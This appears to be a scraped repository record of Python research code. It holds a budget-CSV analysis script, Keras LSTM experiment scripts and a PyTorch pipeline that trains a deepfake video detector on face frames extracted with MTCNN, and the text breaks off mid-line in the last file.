"text": "import os\r\nimport csv\r\n\r\n#Set Path\r\ncsvpath = os.path.join(\"Resources\", \"budget_data.csv\")\r\n\r\n#Open CSV \r\nwith open(csvpath, 'r') as csvfile:\r\n csvreader = csv.reader(csvfile, delimiter=\",\")\r\n csv_header = next(csvreader)\r\n\r\n\r\n #print(f\"CSV Header: {csv_header}\")\r\n\r\n#Count month and Profit/Loss\r\n month_count = 0\r\n total_pl = 0\r\n number_value = []\r\n month_list = []\r\n first_row = next(csvreader)\r\n previoius_profit_loss = int(first_row[1])\r\n print(previoius_profit_loss)\r\n print(type(previoius_profit_loss))\r\n month_count = month_count + 1\r\n total_pl += int(first_row[1])\r\n for row in csvreader:\r\n month_count = month_count + 1\r\n total_pl += int(row[1])\r\n number_value.append(int(row[1]))\r\n month_list.append(row[0])\r\n change = int(row[1]) - previoius_profit_loss\r\n previoius_profit_loss = int(row[1])\r\n max_value_index = number_value.index(max(number_value))\r\n min_value_index = number_value.index(min(number_value))\r\n Month_Max = month_list[max_value_index]\r\n Month_Min = month_list[min_value_index]\r\n\r\n\r\n\r\n print(\"Financial Analysis\")\r\n print(\"----------------------------\")\r\n print(\"Total Months: \" + str(month_count))\r\n print(\"Total Profit: \" + str(total_pl))\r\n print(\"Average Change:\", previoius_profit_loss/int(month_count))\r\n print(\"----------------------------\")\r\n print(\"Greatest Increase in Porfits {} {}\".format(Month_Max, max(number_value)))\r\n print(\"Greatest Decrease in Porfits {} {}\".format(Month_Min, min(number_value)))"
}
] | 3 |
vishal3477/vishal
|
https://github.com/vishal3477/vishal
|
739b979158ea73e73a88862394e8efe97bbdecbe
|
702dc83650d1abcd2931cac9e4f7b274f4b8aa43
|
78e9bcff14a32218e5bd72939245963e655b82ad
|
refs/heads/master
| 2020-07-10T07:45:59.187394 | 2020-05-14T03:18:13 | 2020-05-14T03:18:13 | 204,208,354 | 0 | 0 | null | 2019-08-24T20:20:11 | 2020-05-14T01:59:56 | 2020-05-14T03:06:06 |
MATLAB
|
[
{
"alpha_fraction": 0.7149999737739563,
"alphanum_fraction": 0.7413333058357239,
"avg_line_length": 30.589473724365234,
"blob_id": "639cd3915417080223ac611f82426c8bf4ed866a",
"content_id": "236015e1def3fc1794d80f605ec83eb011a7e635",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3000,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 95,
"path": "/Modified LSTM RNN/sample_Model_architecture1.py",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "'''\nSample Architecture using the Model API\n'''\n# typical useful libararies\nfrom __future__ import print_function\nimport numpy as np\nimport os\nimport sys\n\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils import to_categorical\n\nfrom keras.preprocessing import sequence\nfrom keras.models import Model\nfrom keras.models import Sequential\nimport keras.layers\nfrom keras.layers import Dense, Dropout, Embedding, LSTM, Bidirectional\nfrom keras.layers import Conv1D, MaxPooling1D, Input, GlobalMaxPooling1D\nfrom keras.datasets import imdb, reuters\nfrom keras import backend as K\nfrom keras.callbacks import Callback\nimport pdb\n\n#Optional definitions \nBASE_DIR = 'YOUR BASE DIRECTORY'\nGLOVE_DIR = os.path.join(BASE_DIR, 'glove.6B')\nTEXT_DATA_DIR = os.path.join(BASE_DIR, '20_newsgroup')\nMAX_SEQUENCE_LENGTH = 1000\nMAX_NB_WORDS = 20000\nEMBEDDING_DIM = 100\nVALIDATION_SPLIT = 0.2\nbatch_size = 128\nhidden_units = 150\n\n#May setup directory for results--Optional\nresults_folder = 'Directory for your results'\nif os.path.exists(results_folder) == False:\n os.makedirs(results_folder)\nfilename = os.path.join(results_folder, 'results.txt')\n\n#Assuming your data is split between training and validation pairs\nx_train = data[:-num_validation_samples]\ny_train = labels[:-num_validation_samples]\nx_val = data[-num_validation_samples:]\ny_val = labels[-num_validation_samples:]\n\n#DEFINE YOUR ARCHITECTURE using the MODEL API in KERAS\n\n#Input layer\nsequence_input = Input(shape=(MAX_SEQUENCE_LENGTH,))\n\n#FOR EXAMPLE, LSTM3 processing applied to text embedding layer- model\nx1 = Embedding(MAX_NB_WORDS, 300, input_length=MAX_SEQUENCE_LENGTH)(sequence_input)\nlstm = LSTM3(implementation= 1, units=hidden_units,\n activation='sigmoid',\n input_shape=x_train.shape[1:])\nx1 = lstm(x1)\n\n# ConvNet processing--model\nembedded_sequences = embedding_layer(sequence_input)\nx2 = Conv1D(150, 3, activation='relu')(embedded_sequences)\nx2 = MaxPooling1D(3)(x2)\nx2 = Conv1D(150, 3, activation='relu')(x2)\nx2 = MaxPooling1D(3)(x2)\nx2 = Conv1D(150, 3, activation='relu')(x2)\nx2 = GlobalMaxPooling1D()(x2)\nx2 = Dense(150, activation='relu')(x2)\n\n# concatenate lstm-type and ConvNet models\nconc = keras.layers.Concatenate()([x1, x2])\nprint(conc.shape)\n\n#may perform furhter processing\nx = Dropout(0.5)(conc)\npreds = Dense(len(labels_index), activation='softmax')(x)\n\n#Your final input-output model\nmodel = Model(sequence_input, preds)\n\n# You may try using different optimizers and different optimizer configs, e.g., \nmodel.compile('adam', 'binary_crossentropy', metrics=['accuracy'])\n\nprint('Train...')\n## You may define a callback function to collect history, e.g. loss, ... \nhistory = callback_function(filename)\n## YOU need to define the above function\n\n#training using fit\n\nmodel.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=100,\n callbacks=[history],\n validation_data=[x_val, y_val])"
},
{
"alpha_fraction": 0.5686102509498596,
"alphanum_fraction": 0.584392786026001,
"avg_line_length": 39.69643020629883,
"blob_id": "fc0b7c0b97242eefad524766fbae4e0c75b73c06",
"content_id": "ffdb6a31fe71d503d9df08e67c0e2975e59f321e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2281,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 56,
"path": "/Deepfake video detection model/pre_proc.py",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport cv2\nimport os\n#from RetinaFace.retinaface import RetinaFace\n#from RetinaFace.face_align import norm_crop\nfrom torchvision import transforms\nimport random\nimport torch\nimport pickle\nfrom facenet_pytorch import MTCNN\nimport glob\nfrom PIL import Image\n\n\nmtcnn = MTCNN(select_largest=False)\nmetadatas=[]\ndata_dir=\"/mnt/gs18/scratch/users/asnanivi/1/\"\n#print(data_dir)\n\nfolders=[\"dfdc_train_part_08\",\"dfdc_train_part_09\",\"dfdc_train_part_10\",\"dfdc_train_part_11\",\"dfdc_train_part_12\",\"dfdc_train_part_00\"]\n#metadatas=pd.read_json(data_dir + \"/deepfake-detection-challenge/\"+folders[0]+\"/metadata.json\", orient='index')\nfor f in folders:\n metadatas.append([pd.read_json(data_dir +f + \"/metadata.json\", orient='index'), f])\nn_frames=30\nfor metadata in metadatas:\n for foldername in folders:\n #filenames = glob.glob('C:/Users/visha/Desktop/MSU/Prof. Liu/deepfake-detection-challenge/'+foldername+'/*.mp4')\n for index, row in metadata[0].iterrows():\n v_cap = cv2.VideoCapture(data_dir+foldername+\"/\"+index)\n v_len = int(v_cap.get(cv2.CAP_PROP_FRAME_COUNT))\n print(v_len)\n # Loop through video\n batch_size = 32\n frames = []\n boxes = []\n landmarks = []\n view_frames = []\n view_boxes = []\n view_landmarks = []\n sample = np.linspace(0, v_len - 1, n_frames).astype(int)\n for count in range(v_len):\n if count in sample:\n # Load frame\n success, frame = v_cap.read()\n if not success:\n continue\n\n # Add to batch, resizing for speed\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = Image.fromarray(frame)\n frame = frame.resize([int(f * 0.25) for f in frame.size])\n #frames.append(frame)\n out_name = \"{:s}_{:0>4d}.png\".format(index.split('.')[0], count)\n #save_paths = [\"D:/facebook_frames/\"+foldername+\"/\"+'image_{i}.jpg' for i in range(v_len)]\n mtcnn(frame, save_path=\"/mnt/home/asnanivi/Desktop/Deepfake/\"+foldername+\"/\"+out_name)\n\n\n"
},
{
"alpha_fraction": 0.8709677457809448,
"alphanum_fraction": 0.8709677457809448,
"avg_line_length": 30,
"blob_id": "c2f237bbdcd531922d8f44a1a183684f982fde60",
"content_id": "b252ccba2bcc843a5082f7618e9e67714570c602",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 31,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 1,
"path": "/Deepfake video detection model/readme.txt",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "Deepfake video detection model\n"
},
{
"alpha_fraction": 0.6173622012138367,
"alphanum_fraction": 0.6400774717330933,
"avg_line_length": 35.86274337768555,
"blob_id": "943cc2144524459b9e5956a241a751b65dd2c4a6",
"content_id": "c48b706bd755d7ae7e73e6e23a157efe31da70ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5679,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 153,
"path": "/Deepfake video detection model/deepfake_new.py",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "import os\nfrom PIL import Image\nfrom function import *\nimport numpy as np\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom xception import xception\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nimport cv2\nimport argparse\nimport datetime\nimport pandas as pd\nfrom tensorboardX import SummaryWriter\n\n\n\ntorch.cuda.empty_cache()\nuse_cuda = torch.cuda.is_available() \nprint(use_cuda) # check if GPU exists\n#device = torch.device(\"cuda:0\" if use_cuda else \"cpu\") # use CPU or GPU\ndevice=torch.device('cuda:0')\ntorch.backends.deterministic = True\n\nparser = argparse.ArgumentParser()\n#parser.add_argument('--gpu', type=int, default=0)\nparser.add_argument('--batch_size', type=int, default=16, help='batch size')\nparser.add_argument('--lr', type=float, default=0.0001, help='learning rate')\nparser.add_argument('--seed', type=int, default=1, help='manual seed')\n#parser.add_argument('--it_start', type=int, default=1, help='number of itr to start with')\n#parser.add_argument('--it_end', type=int, default=10000, help='number of itr to end with')\nparser.add_argument('--signature', default=str(datetime.datetime.now()))\n# parser.add_argument('--data_dir', help='directory for data')\nparser.add_argument('--save_dir', default='/mnt/gs18/scratch/users/asnanivi/runs', help='directory for result')\nopt = parser.parse_args()\nprint(opt)\n\nsig = str(datetime.datetime.now())\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(opt.gpu)\nrandom.seed(opt.seed)\ntorch.manual_seed(opt.seed)\ntorch.cuda.manual_seed_all(opt.seed)\n#os.makedirs('%s/modules/%s' % (opt.save_dir, sig), exist_ok=True)\n\nCNN_embed_dim = 2048\nRNN_hidden_layers = 3\nRNN_hidden_nodes = 512\nRNN_FC_dim = 256\ndropout_p = 0.0\nk=2\n\n\nprint(\"Initializing Networks\")\ncnn_encoder = xception(2, load_pretrain=True).to(device)\nrnn_decoder = DecoderRNN(CNN_embed_dim=CNN_embed_dim, h_RNN_layers=RNN_hidden_layers, h_RNN=RNN_hidden_nodes, \n h_FC_dim=RNN_FC_dim, drop_p=dropout_p, num_classes=k).to(device)\nif torch.cuda.device_count() > 1:\n print(\"Using\", torch.cuda.device_count(), \"GPUs!\")\n cnn_encoder = nn.DataParallel(cnn_encoder)\n rnn_decoder = nn.DataParallel(rnn_decoder)\n\ncrnn_params = list(cnn_encoder.parameters()) + list(rnn_decoder.parameters())\n#optimizer_xcp = optim.Adam(model.parameters(), lr=opt.lr)\n#model.cuda()\noptimizer = torch.optim.Adam(crnn_params, lr=opt.lr)\ncse_loss = nn.CrossEntropyLoss().cuda()\n\ndef train(batch, label):\n #model.train()\n cnn_encoder.train()\n rnn_decoder.train()\n temp=cnn_encoder(batch)\n temp=torch.unsqueeze(temp,0)\n temp=temp.permute(1,0,2)\n output = rnn_decoder(temp)\n loss = cse_loss(output, label.type(torch.cuda.LongTensor))\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return[loss.item()]\n\n\ndef write_tfboard(vals, itr, name):\n for idx, item in enumerate(vals):\n writer.add_scalar('data/%s%d' % (name, idx), item, itr)\n\nmain_dir=\"/mnt/scratch/asnanivi/frame_data/frame_data\"\nmetadata_dir=\"/mnt/gs18/scratch/users/asnanivi/1\"\nwriter = SummaryWriter('%s/logs/%s' % (opt.save_dir, sig))\n#folder=next(os.walk(main_dir))\nfolders=[\"dfdc_train_part_14\",\"dfdc_train_part_15\",\"dfdc_train_part_16\",\"dfdc_train_part_17\"]\n#onlyfiles = next(os.walk(os.path.join(main_dir,folder[0],folder[0],\"Fake\")))[2]\n#print(len(onlyfiles))\n\nstate = {\n 'state_dict_cnn':cnn_encoder.state_dict(),\n 'state_dict_rnn': rnn_decoder.state_dict(),\n 'optimizer': optimizer.state_dict(),\n \n}\n\n\nstate1 = torch.load('/mnt/gs18/scratch/users/asnanivi/runs/logs/2020-03-24 20:51:46.488354/99000-dfdc_train_part_06.pickle')\nrnn_decoder.load_state_dict(state1['state_dict_rnn'])\noptimizer.load_state_dict(state1['optimizer'])\ncnn_encoder.load_state_dict(state1['state_dict_cnn'])\n\nfor foldername in folders:\n imagefiles = next(os.walk(os.path.join(main_dir,foldername)))[2]\n imagefiles=sorted(imagefiles)\n metadata=pd.read_json(metadata_dir + '/'+foldername +\"/metadata.json\", orient='index')\n i=0\n prev_file=imagefiles[0]\n print(prev_file.split(\"_\")[0])\n flag=0\n while i<len(imagefiles):\n j=0\n images=[]\n y_train=np.ones((30),dtype=float)\n while j<30 and i<len(imagefiles):\n images.append(cv2.imread(os.path.join(main_dir,foldername,imagefiles[i])))\n if imagefiles[i].split(\"_\")[0]!=prev_file.split(\"_\")[0] or flag==0:\n for index, row in metadata.iterrows():\n if index.split(\".\")[0]==imagefiles[i].split(\"_\")[0]:\n if row[0]==\"FAKE\":\n y_train[j]=0\n elif row[0]==\"REAL\":\n y_train[j]=1\n y_prev=y_train[j]\n flag=1\n \n else:\n y_train[j]=y_prev\n print(imagefiles[i])\n if i%250==0: \n print(imagefiles[i].split(\"_\")[0],y_train[j])\n j=j+1\n i=i+1\n print(y_train)\n images = np.array(images)\n Y_train=np.array(y_train[0:j])\n X_train=torch.from_numpy(images).permute(0,3,1,2)\n X_train=X_train.byte()\n #print(X_train.shape)\n #train = torch.utils.data.TensorDataset(torch.from_numpy(images), torch.from_numpy(Y_train))\n loss = train(torch.from_numpy(images).permute(0,3,1,2), torch.from_numpy(Y_train))\n write_tfboard([loss[0]], i, name='TRAIN')\n if i % 900 == 0:\n torch.save(state, '%s/logs/%s/%d-%s.pickle' % (opt.save_dir, sig, i,foldername))\n print(\"Save Model: {:d}\".format(i))\n \n \n \n "
},
{
"alpha_fraction": 0.4758228361606598,
"alphanum_fraction": 0.5253961682319641,
"avg_line_length": 29.75,
"blob_id": "7683d67c0727e8f1dd403e8008978697b4a1cbe1",
"content_id": "7bb100a34fa06854b6bac0e27d3419c99903e3bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2461,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 80,
"path": "/Modified LSTM RNN/draw_class.py",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pylab\nimport os\nimport pickle\n# the following pylab command is needed to run on the Google Cloud!\npylab.switch_backend('agg')\n#\n#\nclrs = [np.array([0.000, 1.000, 0.000]), np.array([0.000, 1.000, 1.000]),\n np.array([0.000, 0.000, 1.000]), np.array([0.980, 0.502, 0.447]),\n np.array([1.000, 0.000, 0.000]), np.array([1.000, 0.000, 1.000]),\n np.array([0.000, 1.000, 1.000]), np.array([0.236, 0.123, 0.110])]\n\nclass LSTMs():\n \n def __init__(self, path, act, eta):\n self.path = path\n self.act = act\n self.eta = eta\n self.max_val_accs = []\n os.chdir(path)\n \n def draw(self, lstms, epoch):\n \n pylab.figure(1 , figsize=(6,6))\n pylab.subplot(211)\n epc = np.arange(1,epoch+1)\n \n \n for i, lstm in enumerate(lstms):\n lstmp = '%s.p' % lstm\n lstmi = pickle.load(open( lstmp, \"rb\" ))\n acci = lstmi['acc']\n pylab.plot(epc, acci, c=clrs[i], label=lstm) \n #max_acci = max(acci)\n #t = lstm,max_acci\n pylab.legend(loc='best')\n pylab.ylabel('training accuracy')\n pylab.xlabel('epoch')\n pylab.title('eta = %.4g - %s'% (self.eta, self.act))\n pylab.grid()\n \n pylab.subplot(212)\n for i, lstm in enumerate(lstms):\n lstmp = '%s.p' % lstm\n lstmi = pickle.load(open( lstmp, \"rb\" ))\n val_acci = lstmi['val_acc']\n pylab.plot(epc, val_acci, c=clrs[i], label=lstm)\n max_val_acci = max(val_acci)\n t = lstm, max_val_acci\n self.max_val_accs.append(t)\n pylab.ylabel('testing accuracy')\n pylab.xlabel('epoch')\n pylab.grid()\n# \n fig_name = '%s-eta%.4g.png'% (self.act , self.eta)\n pylab.savefig(fig_name)\n \n def get_max(self):\n # for now run draw class first, to get lstms pickle\n print ('eta = %.4g, act = %s' % (eta,act))\n for e in self.max_val_accs:\n print('max val_acc of {} : {}'.format(e[0],e[1]))\n \n\n \n\n#%% \nact = 'sigmoid'\neta = 2e-3\npath = 'YOUR_path_to_the_results_Folder/%s-eta%.4g'% (act , eta) \n\nlstms = LSTMs(path, act, eta)\n#list the binary dot_p files in the folder that need to be plotted\n\nl= ['lstm0', 'lstm6', 'lstm10']\n#Number of epochs must match the # in the binary file\nepoch = 100\nlstms.draw(l, epoch)\nlstms.get_max()\n\n"
},
{
"alpha_fraction": 0.8888888955116272,
"alphanum_fraction": 0.8888888955116272,
"avg_line_length": 35,
"blob_id": "e59e624498b468e0cfcb0dbc325bb354067be95b",
"content_id": "b26cf8705312cfd158756de7cc000c9ffc0f4874",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 36,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 1,
"path": "/Framework for information retrieval/readme.txt",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "Framework for information retrieval\n"
},
{
"alpha_fraction": 0.6164183616638184,
"alphanum_fraction": 0.6421267986297607,
"avg_line_length": 31.60952377319336,
"blob_id": "78c3d1323242c567a0f0195aadc11ab90c04b05b",
"content_id": "40fc9a6cf66970c20edb08a02cd86265f84ff68b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3423,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 105,
"path": "/Modified LSTM RNN/SLIM21_run_example.py",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "#%%\n\"\"\"\n(Now using slim21 module, which is compatible with Keras2.1--backend: Tensorflow)\n\nSample script for importing the SLIM21 models and executing multiple training/\ntesting. \nResults are saved/dumpped in binary files in a folder. \nThen, one uses the \nDRAW\nscript to plot the results\n\nCSANN LAB--MSU--msu.edu\nContributors:\nAtra Akandeh\nFathi Salem\n...\n\n\"\"\"\nfrom __future__ import print_function\nfrom keras.datasets import imdb\nfrom keras.models import Sequential\nfrom keras.preprocessing import sequence\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom keras.layers.embeddings import Embedding\n#from keras.layers import LSTM\nimport numpy as np\n## The following is used only ofr Theano backend\n##from theano.tensor.shared_randomstreams import RandomStreams\n##\nimport pickle\nimport os.path\n#\n##Replace the following path with your own folders/directory where \n##the module slim21.py is located\npth = 'C:/Users/salem.ECE451/KERAS2/keras21/New'\npth1 = 'C:/Users/salem.ECE451/KERAS2/keras21/New/Results/'\nos.chdir(pth)\n##\nfrom slim21 import LSTMs\n#\n\n#np.random.seed(3)\n#srgn = RandomStreams(3)\n\nbatch_size = 32\nnb_classes = 2\nnb_epochs = 1\nhidden_units = 400\nembedding_vector_length = 32\n\n# load the dataset but only keep the top n words, zero the rest\ntop_words = 5000\n# the data, shuffled and split between train and test sets\n(X_train, y_train), (X_test, y_test) = imdb.load_data(num_words=top_words)\n\n\n# truncate and pad input sequences\nmax_review_length = 500\nX_train = sequence.pad_sequences(X_train, maxlen=max_review_length)\nX_test = sequence.pad_sequences(X_test, maxlen=max_review_length)\n\n## This is for comment%%\n\nacts = ['sigmoid' , 'tanh']\n#include all your models ina list\nlstms = ['LSTM1'] #, 'LSTM2', 'LSTM3','LSTM4', 'LSTM5', 'LSTM6', 'LSTM4a', 'LSTM5a', 'LSTM10', 'LSTM11']\n#inlcude all your lr (grid) in a list\netas = [1.2e-5]\n#Use the name label of the model for the file\nnames = ['lstm1']#, 'lstm2', 'lstm3','lstm4', 'lstm5', 'lstm6', 'lstm4a', 'lstm5a', 'lstm10', 'lstm11']\n\nfor act in acts:\n for eta in etas:\n sub = '%s-eta%.4g' % (act,eta)\n \n if not os.path.exists(sub):\n os.mkdir(sub)\n print(\"Directory \" , sub , \" Created \")\n else: \n print(\"Directory \" , sub , \" already exists\")\n \n for cnt, lstm in enumerate(lstms):\n \n np.random.seed(3)\n##May use iF using RandomStreams in Theano \n# srgn = RandomStreams(3)\n#\n\n model = Sequential()\n model.add(Embedding(top_words, embedding_vector_length, input_length=max_review_length, trainable=False)) \n lstmi = LSTMs(implementation= 1, units=hidden_units,\n activation=act,\n input_shape=X_train.shape[1:], model=lstm)\n model.add(lstmi)\n model.add(Dense(1, activation=act))\n adam = Adam(lr=eta, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n model.compile(loss='binary_crossentropy', optimizer=adam , metrics=['accuracy'])\n model.summary()\n hist = model.fit(X_train, y_train, batch_size=batch_size, epochs=nb_epochs,\n verbose=1, validation_data=(X_test, y_test))\n fn = '%s.p' % names[cnt] \n final = os.path.join(pth + '/' +sub, fn)\n A = hist.history\n pickle.dump( A , open( final, \"wb\" ) )"
},
{
"alpha_fraction": 0.5867123007774353,
"alphanum_fraction": 0.6047260165214539,
"avg_line_length": 33.51536560058594,
"blob_id": "6c85a69c21c41ce9490a9463a9e7b704d1d0657e",
"content_id": "39b84007211476c51eb21a8eae388dcec62be908",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14600,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 423,
"path": "/Deepfake video detection model/deepfake.py",
"repo_name": "vishal3477/vishal",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nimport torch.utils.data as data\nimport torchvision\nfrom torch.autograd import Variable\nfrom function import *\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\nfrom sklearn.metrics import accuracy_score\nimport pickle\nfrom facenet_pytorch import MTCNN, InceptionResnetV1, extract_face\nimport pandas as pd\nimport json\nimport glob\nimport time\nimport cv2\nfrom matplotlib import pyplot as plt\n# Detect devices\ntorch.cuda.empty_cache()\nuse_cuda = torch.cuda.is_available() \nprint(use_cuda) # check if GPU exists\n#device = torch.device(\"cuda:0\" if use_cuda else \"cpu\") # use CPU or GPU\ndevice=torch.device('cuda:0')\nclass DetectionPipeline:\n \"\"\"Pipeline class for detecting faces in the frames of a video file.\"\"\"\n \n def __init__(self, detector, n_frames=30, batch_size=30, resize=1.4):\n \"\"\"Constructor for DetectionPipeline class.\n \n Keyword Arguments:\n n_frames {int} -- Total number of frames to load. These will be evenly spaced\n throughout the video. If not specified (i.e., None), all frames will be loaded.\n (default: {None})\n batch_size {int} -- Batch size to use with MTCNN face detector. (default: {32})\n resize {float} -- Fraction by which to resize frames from original prior to face\n detection. A value less than 1 results in downsampling and a value greater than\n 1 result in upsampling. (default: {None})\n \"\"\"\n self.detector = detector\n self.n_frames = n_frames\n self.batch_size = batch_size\n self.resize = resize\n \n def __call__(self, filename):\n \"\"\"Load frames from an MP4 video and detect faces.\n\n Arguments:\n filename {str} -- Path to video.\n \"\"\"\n # Create video reader and find length\n v_cap = cv2.VideoCapture(filename)\n v_len = int(v_cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n # Pick 'n_frames' evenly spaced frames to sample\n if self.n_frames is None:\n sample = np.arange(0, v_len)\n else:\n sample = np.linspace(0, v_len - 1, self.n_frames).astype(int)\n\n # Loop through frames\n #faces = []\n face=[]\n frames = []\n faces = []\n required_size=(224, 224)\n flag=0\n for j in range(v_len):\n success = v_cap.grab()\n if j in sample:\n # Load frame\n success, frame = v_cap.retrieve()\n if not success:\n continue\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = Image.fromarray(frame)\n \n # Resize frame to desired size\n if self.resize is not None:\n frame = frame.resize([int(d * self.resize) for d in frame.size])\n #frames.append(frame)\n\n # When batch is full, detect faces and reset frame list\n #if len(frames) % self.batch_size == 0 or j == sample[-1]:\n \n face=self.detector(frame)\n \n if flag==0:\n if face==None:\n face=torch.zeros([3,256,342],dtype=torch.float32)\n face_p=face\n else: \n face=torch.unsqueeze(face,dim=0)\n face = F.interpolate(face, size=(256,342), mode='bilinear', align_corners=False)\n faces=face\n \n #print(face.shape)\n if face!=None and flag!=0:\n face_p=face\n face=torch.unsqueeze(face,dim=0)\n face = F.interpolate(face, size=(256,342), mode='bilinear', align_corners=False)\n faces = torch.cat([face,faces], dim=0)\n if face==None and flag!=0:\n face=torch.unsqueeze(face_p,dim=0)\n face = F.interpolate(face, size=(256,342), mode='bilinear', align_corners=False)\n faces = torch.cat([face,faces], dim=0)\n flag=1\n \n #face=self.detector(frames)\n #faces.extend(face)\n #print(faces.shape)\n \n\n \n print(faces.shape)\n v_cap.release()\n\n return faces \ndef process_faces(faces, resnet):\n # Filter out frames without faces\n faces = [f for f in faces if f is not None]\n faces = torch.cat(faces).to(device)\n\n # Generate facial feature vectors using a pretrained model\n embeddings = resnet(faces)\n\n return embeddings\n\n# set path\n#data_path = \"./mnt/gnt/users/asnanivi/facebook data/dfdc_train_part_0/\" # define UCF-101 RGB data path\nsave_model_path = \"./CRNN_ckpt/\"\nDATA_FOLDER = '/mnt/gs18/scratch/users/asnanivi'\nTRAIN_SAMPLE_FOLDER = 'train_sample_videos'\n#TEST_FOLDER = 'test_videos'\n\n# EncoderCNN architecture\nCNN_fc_hidden1, CNN_fc_hidden2 = 1024, 768\nCNN_embed_dim = 512 # latent dim extracted by 2D CNN\nimg_x, img_y = 256, 342 # resize video 2d frame size\ndropout_p = 0.0 # dropout probability\n\n# DecoderRNN architecture\nRNN_hidden_layers = 3\nRNN_hidden_nodes = 512\nRNN_FC_dim = 256\n\n# training parameters\nk = 101 # number of target category\nepochs = 10 # training epochs\nbatch_size = 30 \nlearning_rate = 1e-4\nlog_interval = 10 # interval for displaying training info\n\n# Select which frame to begin & end in videos\nbegin_frame, end_frame, skip_frame = 1, 29, 1\n\n\ndef train(log_interval, model, device, train_loader, optimizer, epoch):\n # set model as training mode\n cnn_encoder, rnn_decoder = model\n cnn_encoder.train()\n rnn_decoder.train()\n\n losses = []\n scores = []\n N_count = 0 # counting total trained sample in one epoch\n for batch_idx, (X, y) in enumerate(train_loader):\n # distribute data to device\n X, y = X.to(device), y.to(device).view(-1, )\n\n N_count += X.size(0)\n\n optimizer.zero_grad()\n output = rnn_decoder(cnn_encoder(X)) # output has dim = (batch, number of classes)\n\n loss = F.cross_entropy(output, y)\n losses.append(loss.item())\n\n # to compute accuracy\n y_pred = torch.max(output, 1)[1] # y_pred != output\n step_score = accuracy_score(y.cpu().data.squeeze().numpy(), y_pred.cpu().data.squeeze().numpy())\n scores.append(step_score) # computed on CPU\n\n loss.backward()\n optimizer.step()\n\n # show information\n if (batch_idx + 1) % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}, Accu: {:.2f}%'.format(\n epoch + 1, N_count, len(train_loader.dataset), 100. * (batch_idx + 1) / len(train_loader), loss.item(), 100 * step_score))\n\n return losses, scores\n\n\ndef validation(model, device, optimizer, test_loader):\n # set model as testing mode\n cnn_encoder, rnn_decoder = model\n cnn_encoder.eval()\n rnn_decoder.eval()\n\n test_loss = 0\n all_y = []\n all_y_pred = []\n with torch.no_grad():\n for X, y in test_loader:\n # distribute data to device\n X, y = X.to(device), y.to(device).view(-1, )\n\n output = rnn_decoder(cnn_encoder(X))\n\n loss = F.cross_entropy(output, y, reduction='sum')\n test_loss += loss.item() # sum up batch loss\n y_pred = output.max(1, keepdim=True)[1] # (y_pred != output) get the index of the max log-probability\n\n # collect all y and y_pred in all batches\n all_y.extend(y)\n all_y_pred.extend(y_pred)\n\n test_loss /= len(test_loader.dataset)\n\n # compute accuracy\n all_y = torch.stack(all_y, dim=0)\n all_y_pred = torch.stack(all_y_pred, dim=0)\n test_score = accuracy_score(all_y.cpu().data.squeeze().numpy(), all_y_pred.cpu().data.squeeze().numpy())\n\n # show information\n print('\\nTest set ({:d} samples): Average loss: {:.4f}, Accuracy: {:.2f}%\\n'.format(len(all_y), test_loss, 100* test_score))\n\n # save Pytorch models of best record\n torch.save(cnn_encoder.state_dict(), os.path.join(save_model_path, 'cnn_encoder_epoch{}.pth'.format(epoch + 1))) # save spatial_encoder\n torch.save(rnn_decoder.state_dict(), os.path.join(save_model_path, 'rnn_decoder_epoch{}.pth'.format(epoch + 1))) # save motion_encoder\n torch.save(optimizer.state_dict(), os.path.join(save_model_path, 'optimizer_epoch{}.pth'.format(epoch + 1))) # save optimizer\n print(\"Epoch {} model saved!\".format(epoch + 1))\n\n return test_loss, test_score\n\n\n\n#device = torch.device(\"cpu\")\n\n# Data loading parameters\nparams = {'batch_size': batch_size, 'shuffle': True, 'num_workers': 4, 'pin_memory': True} if use_cuda else 